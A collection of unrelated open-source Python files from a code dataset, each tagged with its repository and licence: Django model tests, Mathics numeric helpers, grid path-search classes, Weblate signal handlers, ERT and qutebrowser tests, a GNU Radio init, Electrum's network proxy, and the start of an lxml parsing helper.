model_name = model._meta.model_name
profile = mommy.make(
model_name,
username="test.{}".format(model_name),
)
donor_payment_channel = self.donor_payment_channel.make(
regular_payments="onetime",
user=profile,
money_account=self.bank_account,
)
self.assertEqual(donor_payment_channel.extra_money, None)
self.assertEqual(donor_payment_channel.extra_payments(), ICON_FALSE)
class TestNameFunctions(TestCase):
"""Test DonorPaymentChannel.person_name(), DonorPaymentChannel.__str__()"""
def setUp(self):
user_profile = mommy.make(
"aklub.UserProfile",
first_name="Test",
last_name="User 1",
email="test@test.com",
title_before="Ing.",
)
mommy.make(
"aklub.ProfileEmail",
email="test@test.com",
user=user_profile,
is_primary=True,
)
company_profile = mommy.make(
"aklub.CompanyProfile",
username="test",
name="Company",
email="test@test.com",
)
mommy.make(
"aklub.CompanyContact",
email="test@test.com",
company=company_profile,
is_primary=True,
)
administrative_unit = mommy.make(
"aklub.AdministrativeUnit",
name="test",
)
bank_account = mommy.make(
"aklub.BankAccount",
administrative_unit=administrative_unit,
)
self.donor_payment_channel_user_profile = mommy.make(
"aklub.DonorPaymentChannel",
event__name="Foo campaign",
user=user_profile,
VS=1234,
money_account=bank_account,
)
self.donor_payment_channel_company_profile = mommy.make(
"aklub.DonorPaymentChannel",
event__name="Foo campaign",
user=company_profile,
VS=5678,
money_account=bank_account,
)
def test_user_person_name(self):
self.assertEqual(
self.donor_payment_channel_user_profile.person_name(), "Ing. User 1 Test"
)
self.assertEqual(
self.donor_payment_channel_company_profile.person_name(), "Company"
)
def test_str(self):
self.assertEqual(
self.donor_payment_channel_user_profile.__str__(), "Payment channel: 1234"
)
self.assertEqual(
self.donor_payment_channel_company_profile.__str__(),
"Payment channel: 5678",
)
@freeze_time("2010-5-1")
class TestDenormalizedFields(TestCase):
"""
testing if denormalized fields of donor_payment_channel are changed,
which are made by django-computedfields library
"""
def setUp(self):
unit = mommy.make("aklub.AdministrativeUnit", name="test")
self.money_acc = mommy.make(
"aklub.BankAccount", administrative_unit=unit, bank_account_number="12345"
)
self.event = mommy.make(
"events.event",
name="name",
administrative_units=[
unit,
],
)
self.dpch = mommy.make(
"aklub.DonorPaymentChannel",
id=10,
money_account=self.money_acc,
regular_frequency="monthly",
regular_amount=100,
expected_date_of_first_payment=datetime.date(year=2022, month=1, day=19),
event=self.event,
)
mommy.make(
"aklub.Payment",
user_donor_payment_channel=self.dpch,
recipient_account=self.money_acc,
amount=100,
date=datetime.date(year=2022, month=1, day=19),
)
def test_payment_changed(self):
payment = self.dpch.payment_set.first()
payment.amount = 500
payment.save()
dpch = DonorPaymentChannel.objects.get(id=10)
self.assertEqual(dpch.number_of_payments, 1)
self.assertEqual(dpch.last_payment, payment)
self.assertEqual(dpch.expected_regular_payment_date, datetime.date(2022, 2, 19))
self.assertEqual(dpch.payment_total, 500)
self.assertEqual(dpch.extra_money, 400)
self.assertEqual(dpch.no_upgrade, False)
def test_payment_added(self):
payment = mommy.make(
"aklub.Payment",
user_donor_payment_channel=self.dpch,
recipient_account=self.money_acc,
amount=300,
date=datetime.date(year=2022, month=2, day=19),
)
payment.user_donor_payment_channel = self.dpch
payment.save()
dpch = DonorPaymentChannel.objects.get(id=10)
self.assertEqual(dpch.number_of_payments, 2)
self.assertEqual(dpch.last_payment, payment)
self.assertEqual(dpch.expected_regular_payment_date, datetime.date(2022, 3, 22))
self.assertEqual(dpch.payment_total, 400)
self.assertEqual(dpch.extra_money, 300)
self.assertEqual(dpch.no_upgrade, False)
class TestModelMethods(TestCase):
def setUp(self):
self.user = mommy.make("aklub.UserProfile", sex="male")
unit = mommy.make("aklub.AdministrativeUnit", name="test1")
self.bank_acc = mommy.make(
"aklub.BankAccount", bank_account_number="123", administrative_unit=unit
)
self.event = mommy.make("Event")
@freeze_time("2017-5-1")
def test_regular_payments_delay(self):
self.dpch = mommy.make(
"aklub.DonorPaymentChannel",
user=self.user,
event=self.event,
money_account=self.bank_acc,
regular_payments="onetime",
)
# fails, because cant be calculated => return None
self.assertEqual(self.dpch.regular_payments_delay(), None)
# additional info which is needed for calculating
self.dpch.regular_payments = "regular"
self.dpch.regular_frequency = "monthly"
self.dpch.save()
self.payment = mommy.make(
"aklub.Payment",
amount=350,
date="2017-03-01",
type="regular",
user_donor_payment_channel=self.dpch,
)
self.dpch.refresh_from_db()
# 20 days delay, because we have 10 days tolerance
self.assertEqual(self.dpch.regular_payments_delay(), datetime.timedelta(20))
self.payment = mommy.make(
"aklub.Payment",
amount=350,
date="2017-04-29",
type="regular",
user_donor_payment_channel=self.dpch,
)
self.dpch.refresh_from_db()
# paid 3 days ago so in time
self.assertEqual(self.dpch.regular_payments_delay(), 0)
|
auto-mat/klub
|
apps/aklub/tests/models/test_donor_payment_channel.py
|
Python
|
gpl-3.0
| 18,112
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import sympy
import mpmath
from math import log
from six.moves import range
from mathics.core.util import unicode_superscript
def get_type(value):
if isinstance(value, sympy.Integer):
return 'z'
elif isinstance(value, sympy.Rational):
return 'q'
elif isinstance(value, sympy.Float) or isinstance(value, mpmath.mpf):
return 'f'
elif (isinstance(value, sympy.Expr) and value.is_number and
not value.is_real) or isinstance(value, mpmath.mpc):
return 'c'
else:
return None
def same(v1, v2):
return get_type(v1) == get_type(v2) and v1 == v2
def is_0(value):
return get_type(value) == 'z' and value == 0
def sympy2mpmath(value, prec=None):
if prec is None:
from mathics.builtin.numeric import machine_precision
prec = machine_precision
value = value.n(dps(prec))
if value.is_real:
return mpmath.mpf(value)
elif value.is_number:
return mpmath.mpc(*value.as_real_imag())
else:
return None
class SpecialValueError(Exception):
def __init__(self, name):
self.name = name
def mpmath2sympy(value, prec):
if isinstance(value, mpmath.mpc):
return (sympy.Float(str(value.real), dps(prec)) +
sympy.I * sympy.Float(str(value.imag), dps(prec)))
elif isinstance(value, mpmath.mpf):
if str(value) in ('+inf', '-inf'):
raise SpecialValueError('ComplexInfinity')
return sympy.Float(str(value), dps(prec))
else:
return None
C = log(10, 2) # ~ 3.3219280948873626
def dps(prec):
return max(1, int(round(int(prec) / C - 1)))
def prec(dps):
return max(1, int(round((int(dps) + 1) * C)))
def format_float(value, pretty=True, parenthesize_plus=False):
s = str(value)
s = s.split('e')
if len(s) == 2:
man, exp = s
if pretty:
return '%s\u00d710%s' % (format_float(man), unicode_superscript(exp))
else:
result = '%s*10^%s' % (format_float(man), exp)
if parenthesize_plus:
result = '(%s)' % result
return result
else:
return s[0]
def mul(x, y):
return x * y
def add(x, y):
return x + y
def min_prec(*args):
result = None
for arg in args:
prec = arg.get_precision()
if result is None or (prec is not None and prec < result):
result = prec
return result
def pickle_mp(value):
return (get_type(value), str(value))
def unpickle_mp(value):
type, value = value
if type == 'z':
return sympy.Integer(value)
elif type == 'q':
return sympy.Rational(value)
elif type == 'f':
return sympy.Float(value)
else:
return value
# algorithm based on
# http://stackoverflow.com/questions/5110177/how-to-convert-floating-point-number-to-base-3-in-python # nopep8
def convert_base(x, base, precision=10):
sign = -1 if x < 0 else 1
x *= sign
length_of_int = 0 if x == 0 else int(log(x, base))
iexps = list(range(length_of_int, -1, -1))
import string
digits = string.digits + string.ascii_lowercase
if base > len(digits):
raise ValueError
def convert(x, base, exponents):
out = []
for e in exponents:
d = int(x // (base ** e))
x -= d * (base ** e)
out.append(digits[d])
if x == 0 and e < 0:
break
return out
int_part = convert(int(x), base, iexps)
if sign == -1:
int_part.insert(0, '-')
if (isinstance(x, float)):
fexps = list(range(-1, -int(precision + 1), -1))
real_part = convert(x - int(x), base, fexps)
return "%s.%s" % (''.join(int_part), ''.join(real_part))
else:
return ''.join(int_part)
def convert_int_to_digit_list(x, base):
if x == 0:
return [0]
x = abs(x)
length_of_int = int(log(x, base)) + 1
iexps = list(range(length_of_int, -1, -1))
def convert(x, base, exponents):
out = []
for e in exponents:
d = int(x // (base ** e))
x -= d * (base ** e)
if out or d != 0: # drop any leading zeroes
out.append(d)
if x == 0 and e < 0:
break
return out
return convert(x, base, iexps)
|
bnjones/Mathics
|
mathics/core/numbers.py
|
Python
|
gpl-3.0
| 4,474
|
import numpy as np
class Search(object):
"""
A base class for all searching algorithms on grid
"""
def __init__(self, grid, start_point, final_point):
self.grid = grid
self.start_point = start_point
self.final_point = final_point
class dijkstra(Search):
"""
A specific class that applies dijkstra shortest path algorithm
"""
def __init__(self, grid, start_point, final_point):
Search.__init__(self, grid, start_point, final_point)
def eval_cost(self):
"""
This function evaluates the cost of the shortest path
:return: The cost of the shortest path
"""
if self.start_point == self.final_point:
total_cost = 0
return total_cost
open_list = [np.append([0], self.start_point)]
closed_list = np.copy(self.grid.grid)
while True:
if len(open_list) == 0:
print ("There is no open path from the origin to the final destination")
return None
open_list = sorted(open_list, key=lambda row: row[0], reverse=True)
element = open_list.pop()
if (element[1] == self.final_point[0]) and (element[2] == self.final_point[1]):
total_cost = element[0]
print ("Final point reached with cost {}".format(total_cost))
print(closed_list)
return total_cost
successors = self.grid.find_successors(element[1:])
open_list += [[element[0] + self.grid.cost] + list(s) for s in successors if closed_list[s[0], s[1]] == 0]
closed_list[element[1], element[2]] = 1
class Astar(Search):
def __init__(self, grid, start_point, final_point, heuristic = None):
Search.__init__(self, grid, start_point, final_point)
if heuristic is not None:
self.heuristic = heuristic
else:
self.heuristic = self._default_heuristic()
def eval_cost(self):
if self.start_point == self.final_point:
total_cost = 0
return total_cost
x = self.start_point[0]
y = self.start_point[1]
f = self.heuristic[x,y]
open_list = [[f,x,y]]
closed_list = np.copy(self.grid.grid)
while True:
if len(open_list) == 0:
print ("There is no open path from the origin to the final destination")
return None
open_list = sorted(open_list, key=lambda row: row[0], reverse=True)
element = open_list.pop()
x = element[1]
y = element[2]
f = element[0]
if (x == self.final_point[0]) and (y == self.final_point[1]):
total_cost = f - self.heuristic[x,y]
print ("Final point reached with cost {}".format(total_cost))
print (closed_list)
return total_cost
successors = self.grid.find_successors(element[1:])
open_list += [[f + 1 + self.heuristic[s[0], s[1]] - self.heuristic[x, y], s[0], s[1]]
for s in successors if closed_list[s[0], s[1]] == 0]
closed_list[element[1], element[2]] = 1
def _default_heuristic(self):
grid_shape = self.grid.grid.shape
heuristic = np.zeros(grid_shape)
for i in range(grid_shape[0]):
for j in range(grid_shape[1]):
heuristic[i,j] = abs(self.final_point[0] - i) + abs(self.final_point[0] - j)
return heuristic
|
ruleva1983/udacity-selfdrivingcar
|
term3/exercises/search_strategies/python/search.py
|
Python
|
gpl-3.0
| 3,546
|
#
# Copyright © 2012–2022 Michal Čihař <michal@cihar.com>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
import os
from django.db.models.signals import m2m_changed, post_delete, post_save
from django.dispatch import receiver
from weblate.trans.models._conf import WeblateConf
from weblate.trans.models.agreement import ContributorAgreement
from weblate.trans.models.alert import Alert
from weblate.trans.models.announcement import Announcement
from weblate.trans.models.change import Change
from weblate.trans.models.comment import Comment
from weblate.trans.models.component import Component
from weblate.trans.models.componentlist import AutoComponentList, ComponentList
from weblate.trans.models.label import Label
from weblate.trans.models.project import Project
from weblate.trans.models.projecttoken import ProjectToken
from weblate.trans.models.suggestion import Suggestion, Vote
from weblate.trans.models.translation import Translation
from weblate.trans.models.unit import Unit
from weblate.trans.models.variant import Variant
from weblate.trans.signals import user_pre_delete
from weblate.utils.decorators import disable_for_loaddata
from weblate.utils.files import remove_tree
__all__ = [
"Project",
"Component",
"Translation",
"Unit",
"Suggestion",
"Comment",
"Vote",
"Change",
"Announcement",
"ComponentList",
"WeblateConf",
"ContributorAgreement",
"Alert",
"Variant",
"Label",
"ProjectToken",
]
def delete_object_dir(instance):
"""Remove path if it exists."""
project_path = instance.full_path
if os.path.exists(project_path):
remove_tree(project_path)
@receiver(post_delete, sender=Project)
def project_post_delete(sender, instance, **kwargs):
"""Handler to delete (sub)project directory on project deletion."""
# Invalidate stats
instance.stats.invalidate()
# Remove directory
delete_object_dir(instance)
@receiver(post_delete, sender=Component)
def component_post_delete(sender, instance, **kwargs):
"""Handler to delete (sub)project directory on project deletion."""
# Invalidate stats
instance.stats.invalidate()
# Do not delete linked components
if not instance.is_repo_link:
delete_object_dir(instance)
@receiver(m2m_changed, sender=Unit.labels.through)
@disable_for_loaddata
def change_labels(sender, instance, action, pk_set, **kwargs):
"""Update unit labels."""
if (
action not in ("post_add", "post_remove", "post_clear")
or (action != "post_clear" and not pk_set)
or not instance.is_source
):
return
if not instance.is_batch_update:
instance.translation.component.invalidate_cache()
@receiver(user_pre_delete)
def user_commit_pending(sender, instance, **kwargs):
"""Commit pending changes for user on account removal."""
# All user changes
all_changes = Change.objects.last_changes(instance).filter(user=instance)
# Filter where project is active
user_translation_ids = all_changes.values_list("translation", flat=True).distinct()
# Commit changes where user is last author
for translation in Translation.objects.filter(pk__in=user_translation_ids):
try:
last_author = translation.change_set.content()[0].author
except IndexError:
# Non content changes
continue
if last_author == instance:
translation.commit_pending("user delete", None)
@receiver(m2m_changed, sender=ComponentList.components.through)
@disable_for_loaddata
def change_componentlist(sender, instance, action, **kwargs):
if not action.startswith("post_"):
return
instance.stats.invalidate()
@receiver(post_save, sender=AutoComponentList)
@disable_for_loaddata
def auto_componentlist(sender, instance, **kwargs):
for component in Component.objects.iterator():
instance.check_match(component)
@receiver(post_save, sender=Project)
@disable_for_loaddata
def auto_project_componentlist(sender, instance, **kwargs):
for component in instance.component_set.iterator():
auto_component_list(sender, component)
@receiver(post_save, sender=Component)
@disable_for_loaddata
def auto_component_list(sender, instance, **kwargs):
for auto in AutoComponentList.objects.iterator():
auto.check_match(instance)
@receiver(post_delete, sender=Component)
@disable_for_loaddata
def post_delete_linked(sender, instance, **kwargs):
# When removing project, the linked component might be already deleted now
try:
if instance.linked_component:
instance.linked_component.update_link_alerts(noupdate=True)
except Component.DoesNotExist:
pass
@receiver(post_save, sender=Comment)
@receiver(post_save, sender=Suggestion)
@receiver(post_delete, sender=Suggestion)
@disable_for_loaddata
def stats_invalidate(sender, instance, **kwargs):
"""Invalidate stats on new comment or suggestion."""
# Invalidate stats counts
instance.unit.translation.invalidate_cache()
# Invalidate unit cached properties
for key in ["all_comments", "suggestions"]:
if key in instance.__dict__:
del instance.__dict__[key]
|
nijel/weblate
|
weblate/trans/models/__init__.py
|
Python
|
gpl-3.0
| 5,857
|
# Copyright (C) 2017 Equinor ASA, Norway.
#
# The file 'test_model_config.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
from ecl.util.test import TestAreaContext
from libres_utils import ResTest
from res.enkf import ConfigKeys, ModelConfig, ResConfig
from res.sched import HistorySourceEnum
class ModelConfigTest(ResTest):
def setUp(self):
self.config_both = {
"INTERNALS": {
"CONFIG_DIRECTORY": "simple_config",
},
"SIMULATION": {
"QUEUE_SYSTEM": {
"JOBNAME": "JOBNAME%d",
},
"RUNPATH": "/tmp/simulations/run%d",
"NUM_REALIZATIONS": 1,
"JOB_SCRIPT": "script.sh",
"ENSPATH": "Ensemble",
"ECLBASE": "ECLBASE%d",
},
}
self.config_eclbase = {
"INTERNALS": {
"CONFIG_DIRECTORY": "simple_config",
},
"SIMULATION": {
"RUNPATH": "/tmp/simulations/run%d",
"NUM_REALIZATIONS": 1,
"JOB_SCRIPT": "script.sh",
"ENSPATH": "Ensemble",
"ECLBASE": "ECLBASE%d",
},
}
self.config_jobname = {
"INTERNALS": {
"CONFIG_DIRECTORY": "simple_config",
},
"SIMULATION": {
"QUEUE_SYSTEM": {
"JOBNAME": "JOBNAME%d",
},
"RUNPATH": "/tmp/simulations/run%d",
"NUM_REALIZATIONS": 1,
"JOB_SCRIPT": "script.sh",
"ENSPATH": "Ensemble",
},
}
def test_eclbase_and_jobname(self):
case_directory = self.createTestPath("local/simple_config")
with TestAreaContext("test_eclbase_and_jobname") as work_area:
work_area.copy_directory(case_directory)
res_config = ResConfig(config=self.config_both)
model_config = res_config.model_config
ecl_config = res_config.ecl_config
self.assertTrue(ecl_config.active())
self.assertEqual("JOBNAME%d", model_config.getJobnameFormat())
def test_eclbase(self):
case_directory = self.createTestPath("local/simple_config")
with TestAreaContext("test_eclbase") as work_area:
work_area.copy_directory(case_directory)
res_config = ResConfig(config=self.config_eclbase)
model_config = res_config.model_config
ecl_config = res_config.ecl_config
self.assertTrue(ecl_config.active())
self.assertEqual("ECLBASE%d", model_config.getJobnameFormat())
def test_jobname(self):
case_directory = self.createTestPath("local/simple_config")
with TestAreaContext("test_jobname") as work_area:
work_area.copy_directory(case_directory)
res_config = ResConfig(config=self.config_jobname)
model_config = res_config.model_config
ecl_config = res_config.ecl_config
self.assertFalse(ecl_config.active())
self.assertEqual("JOBNAME%d", model_config.getJobnameFormat())
def test_model_config_dict_constructor(self):
case_directory = self.createTestPath("local/configuration_tests")
with TestAreaContext("test_constructor") as work_area:
work_area.copy_directory(case_directory)
res_config = ResConfig(
user_config_file="configuration_tests/model_config.ert"
)
config_dict = {
ConfigKeys.MAX_RESAMPLE: 1,
ConfigKeys.JOBNAME: "model_config_test",
ConfigKeys.RUNPATH: "/tmp/simulations/run%d",
ConfigKeys.NUM_REALIZATIONS: 10,
ConfigKeys.ENSPATH: "configuration_tests/Ensemble",
ConfigKeys.TIME_MAP: "configuration_tests/input/refcase/time_map.txt",
ConfigKeys.OBS_CONFIG: "configuration_tests/input/observations/observations.txt",
ConfigKeys.DATAROOT: "configuration_tests/",
ConfigKeys.HISTORY_SOURCE: HistorySourceEnum(1),
ConfigKeys.GEN_KW_EXPORT_NAME: "parameter_test.json",
ConfigKeys.FORWARD_MODEL: [
{
ConfigKeys.NAME: "COPY_FILE",
ConfigKeys.ARGLIST: "<FROM>=input/schedule.sch, <TO>=output/schedule_copy.sch",
},
{
ConfigKeys.NAME: "SNAKE_OIL_SIMULATOR",
ConfigKeys.ARGLIST: "",
},
{
ConfigKeys.NAME: "SNAKE_OIL_NPV",
ConfigKeys.ARGLIST: "",
},
{
ConfigKeys.NAME: "SNAKE_OIL_DIFF",
ConfigKeys.ARGLIST: "",
},
],
}
model_config = ModelConfig(
data_root="",
joblist=res_config.site_config.get_installed_jobs(),
last_history_restart=res_config.ecl_config.getLastHistoryRestart(),
refcase=res_config.ecl_config.getRefcase(),
config_dict=config_dict,
)
self.assertEqual(model_config, res_config.model_config)
def test_schedule_file_as_history_is_disallowed(self):
case_directory = self.createTestPath("local/configuration_tests")
with TestAreaContext("test_constructor") as work_area:
work_area.copy_directory(case_directory)
with self.assertRaises(ValueError) as cm:
ResConfig(
user_config_file="configuration_tests/sched_file_as_history_source.ert"
)
# Any assert should per the unittest documentation be outside the
# scope of the assertRaises with-block.
expected = "{} as {} is not supported".format(
str(HistorySourceEnum.SCHEDULE), ConfigKeys.HISTORY_SOURCE
)
self.assertIn(expected, str(cm.exception))
|
joakim-hove/ert
|
tests/libres_tests/res/enkf/test_model_config.py
|
Python
|
gpl-3.0
| 6,704
|
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2017-2021 Ryan Roden-Corrent (rcorre) <ryan@rcorre.net>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Tests for CompletionModel."""
from unittest import mock
import hypothesis
from hypothesis import strategies
import pytest
from PyQt5.QtCore import QModelIndex
from qutebrowser.completion.models import completionmodel, listcategory
from qutebrowser.utils import qtutils
from qutebrowser.api import cmdutils
@hypothesis.given(strategies.lists(
min_size=0, max_size=3,
elements=strategies.integers(min_value=0, max_value=2**31)))
def test_first_last_item(counts):
"""Test that first() and last() index to the first and last items."""
model = completionmodel.CompletionModel()
for c in counts:
cat = mock.Mock(spec=['layoutChanged', 'layoutAboutToBeChanged'])
cat.rowCount = mock.Mock(return_value=c, spec=[])
model.add_category(cat)
data = [i for i, row_count in enumerate(counts) if row_count > 0]
if not data:
# with no items, first and last should be an invalid index
assert not model.first_item().isValid()
assert not model.last_item().isValid()
else:
first = data[0]
last = data[-1]
# first item of the first data category
assert model.first_item().row() == 0
assert model.first_item().parent().row() == first
# last item of the last data category
assert model.last_item().row() == counts[last] - 1
assert model.last_item().parent().row() == last
@hypothesis.given(strategies.lists(elements=strategies.integers(),
min_size=0, max_size=3))
def test_count(counts):
model = completionmodel.CompletionModel()
for c in counts:
cat = mock.Mock(spec=['rowCount', 'layoutChanged',
'layoutAboutToBeChanged'])
cat.rowCount = mock.Mock(return_value=c, spec=[])
model.add_category(cat)
assert model.count() == sum(counts)
@hypothesis.given(pat=strategies.text())
def test_set_pattern(pat, qtbot):
"""Validate the filtering and sorting results of set_pattern."""
model = completionmodel.CompletionModel()
cats = [mock.Mock(spec=['set_pattern']) for _ in range(3)]
for c in cats:
c.set_pattern = mock.Mock(spec=[])
model.add_category(c)
with qtbot.waitSignals([model.layoutAboutToBeChanged, model.layoutChanged],
order='strict'):
model.set_pattern(pat)
for c in cats:
c.set_pattern.assert_called_with(pat)
def test_delete_cur_item():
func = mock.Mock(spec=[])
model = completionmodel.CompletionModel()
cat = listcategory.ListCategory('', [('foo', 'bar')], delete_func=func)
model.add_category(cat)
parent = model.index(0, 0)
model.delete_cur_item(model.index(0, 0, parent))
func.assert_called_once_with(['foo', 'bar'])
def test_delete_cur_item_no_func():
callback = mock.Mock(spec=[])
model = completionmodel.CompletionModel()
cat = listcategory.ListCategory('', [('foo', 'bar')], delete_func=None)
model.rowsAboutToBeRemoved.connect(callback)
model.rowsRemoved.connect(callback)
model.add_category(cat)
parent = model.index(0, 0)
with pytest.raises(cmdutils.CommandError):
model.delete_cur_item(model.index(0, 0, parent))
callback.assert_not_called()
def test_delete_cur_item_no_cat():
"""Test completion_item_del with no selected category."""
callback = mock.Mock(spec=[])
model = completionmodel.CompletionModel()
model.rowsAboutToBeRemoved.connect(callback)
model.rowsRemoved.connect(callback)
with pytest.raises(qtutils.QtValueError):
model.delete_cur_item(QModelIndex())
callback.assert_not_called()
|
forkbong/qutebrowser
|
tests/unit/completion/test_completionmodel.py
|
Python
|
gpl-3.0
| 4,440
|
#
# Copyright 2003-2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# The presence of this file turns this directory into a Python package
"""
Core contents.
"""
# This is the main GNU Radio python module.
# We pull the swig output and the other modules into the ocvc.gr namespace
# If ocvc is installed then the swig output will be in this directory.
# Otherwise it will reside in ../../../swig.
import os
try:
from runtime_swig import *
except ImportError:
dirname, filename = os.path.split(os.path.abspath(__file__))
__path__.append(os.path.join(dirname, "..", "..", "..", "swig"))
from runtime_swig import *
from exceptions import *
from top_block import *
from hier_block2 import *
from tag_utils import *
from gateway import basic_block, sync_block, decim_block, interp_block
# Force the preference database to be initialized
prefs = prefs.singleton
|
atzengin/OCC
|
ocvc-runtime/python/ocvc/oc/__init__.py
|
Python
|
gpl-3.0
| 1,599
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import traceback
import threading
import Queue
import util
from network import Network, serialize_proxy, serialize_server
from simple_config import SimpleConfig
class NetworkProxy(util.DaemonThread):
def __init__(self, socket, config=None):
if config is None:
config = {} # Do not use mutables as default arguments!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if type(config) == type({}) else config
self.message_id = 0
self.unanswered_requests = {}
self.subscriptions = {}
self.debug = False
self.lock = threading.Lock()
self.callbacks = {}
if socket:
self.pipe = util.SocketPipe(socket)
self.network = None
else:
self.pipe = util.QueuePipe()
self.network = Network(self.pipe, config)
self.network.start()
for key in ['fee','status','banner','updated','servers','interfaces']:
value = self.network.get_status_value(key)
self.pipe.get_queue.put({'method':'network.status', 'params':[key, value]})
# status variables
self.status = 'unknown'
self.servers = {}
self.banner = ''
self.blockchain_height = 0
self.server_height = 0
self.interfaces = []
# value returned by estimatefee
self.fee = None
def run(self):
while self.is_running():
self.run_jobs() # Synchronizer and Verifier
try:
response = self.pipe.get()
except util.timeout:
continue
if response is None:
break
# Protect against ill-formed or malicious server responses
try:
self.process(response)
except:
traceback.print_exc(file=sys.stderr)
self.trigger_callback('stop')
if self.network:
self.network.stop()
self.print_error("stopped")
def process(self, response):
if self.debug:
self.print_error("<--", response)
if response.get('method') == 'network.status':
key, value = response.get('params')
if key == 'status':
self.status = value
elif key == 'banner':
self.banner = value
elif key == 'fee':
self.fee = value
elif key == 'updated':
self.blockchain_height, self.server_height = value
elif key == 'servers':
self.servers = value
elif key == 'interfaces':
self.interfaces = value
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, (value,))
return
msg_id = response.get('id')
result = response.get('result')
error = response.get('error')
if msg_id is not None:
with self.lock:
method, params, callback = self.unanswered_requests.pop(msg_id)
else:
method = response.get('method')
params = response.get('params')
with self.lock:
for k,v in self.subscriptions.items():
if (method, params) in v:
callback = k
break
else:
self.print_error("received unexpected notification",
method, params)
return
r = {'method':method, 'params':params, 'result':result,
'id':msg_id, 'error':error}
callback(r)
def send(self, messages, callback):
"""return the ids of the requests that we sent"""
# detect subscriptions
sub = []
for message in messages:
m, v = message
if m[-10:] == '.subscribe':
sub.append(message)
if sub:
with self.lock:
if self.subscriptions.get(callback) is None:
self.subscriptions[callback] = []
for message in sub:
if message not in self.subscriptions[callback]:
self.subscriptions[callback].append(message)
with self.lock:
requests = []
ids = []
for m in messages:
method, params = m
request = { 'id':self.message_id, 'method':method, 'params':params }
self.unanswered_requests[self.message_id] = method, params, callback
ids.append(self.message_id)
requests.append(request)
if self.debug:
self.print_error("-->", request)
self.message_id += 1
self.pipe.send_all(requests)
return ids
def synchronous_get(self, requests, timeout=100000000):
queue = Queue.Queue()
ids = self.send(requests, queue.put)
id2 = ids[:]
res = {}
while ids:
r = queue.get(True, timeout)
_id = r.get('id')
ids.remove(_id)
if r.get('error'):
raise BaseException(r.get('error'))
result = r.get('result')
res[_id] = r.get('result')
out = []
for _id in id2:
out.append(res[_id])
return out
def get_servers(self):
return self.servers
def get_interfaces(self):
return self.interfaces
def get_local_height(self):
return self.blockchain_height
def get_server_height(self):
return self.server_height
def is_connected(self):
return self.status == 'connected'
def is_connecting(self):
return self.status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def get_parameters(self):
return self.synchronous_get([('network.get_parameters', [])])[0]
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server_str = serialize_server(host, port, protocol)
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server_str, True)
# abort if changes were not allowed by config
if self.config.get('server') != server_str or self.config.get('proxy') != proxy_str:
return
return self.synchronous_get([('network.set_parameters', (host, port, protocol, proxy, auto_connect))])[0]
def stop_daemon(self):
return self.send([('daemon.stop',[])], None)
def register_callback(self, event, callback):
with self.lock:
if not self.callbacks.get(event):
self.callbacks[event] = []
self.callbacks[event].append(callback)
def trigger_callback(self, event, params=()):
with self.lock:
callbacks = self.callbacks.get(event,[])[:]
if callbacks:
[callback(*params) for callback in callbacks]
|
shanew/electrum
|
lib/network_proxy.py
|
Python
|
gpl-3.0
| 7,926
|
from . import gui, srv
from util.columns import *
from util.misc import app_devtypes, app_devdata
devdata = lambda: app_devdata('NIO8', get_columns([c_ip_addr, c_serial]), app_devtypes(gui))
|
ivanovev/nio8
|
__init__.py
|
Python
|
gpl-3.0
| 194
|
#!/usr/bin/python
# coding=UTF-8
import re
# parse broken html from file using lxml.html parser and chardect encoding autodetection
def lxmlparse(filepath):
import lxml.html
import chardet
document = open(filepath).read()
print('Info: detecting document encoding...')
document = document.decode(chardet.detect(document)['encoding'])
document = lxml.html.fromstring(document)
